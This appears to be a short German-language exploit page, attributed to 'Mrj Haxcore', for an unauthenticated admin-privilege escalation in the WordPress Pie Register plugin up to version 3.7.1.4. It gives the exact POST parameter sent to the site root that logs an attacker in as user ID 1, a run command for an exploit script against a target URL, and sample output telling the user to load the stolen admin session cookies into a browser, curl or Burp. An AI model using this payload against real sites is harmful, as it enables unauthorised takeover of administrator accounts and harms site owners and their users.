
WordPress Pie Register ≤ 3.7.1.4 – Admin-Privilegienerweiterung (Nicht authentifiziert)
Mrj Haxcore
Das Plugin Pie Register für WordPress (Version ≤ 3.7.1.4) legt einen unauthentifizierten Endpunkt offen, der es einem Angreifer ermöglicht, Admin-Sitzungen zu übernehmen, indem er einfach eine bestimmte Payload per POST sendet.
Die Ausnutzung führt zum Stehlen der Sitzungscookies von Benutzer-ID 1 (normalerweise admin), ohne dass Anmeldedaten erforderlich sind.
pie-registeruser_id_social_site=1
Wird dieser Parameter an die Root-URL (/) gesendet, veranlasst er das Plugin, den Angreifer als Benutzer mit der ID 1 (typischerweise admin) zu authentifizieren und gültige Sitzungscookies auszustellen.
requests, beautifulsoup4 (optional, zum Parsen von Cookies)python3 pie.py http://target.site
---
Ausgabe
[*] Sende Payload, um Admin-Sitzung zu übernehmen...
[+] Sitzungscookies für user_id=1 erfolgreich übernommen (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Übernehmen Sie diese Cookies in Ihrem Browser oder in Tools wie curl oder Burp, um als Admin zu handeln.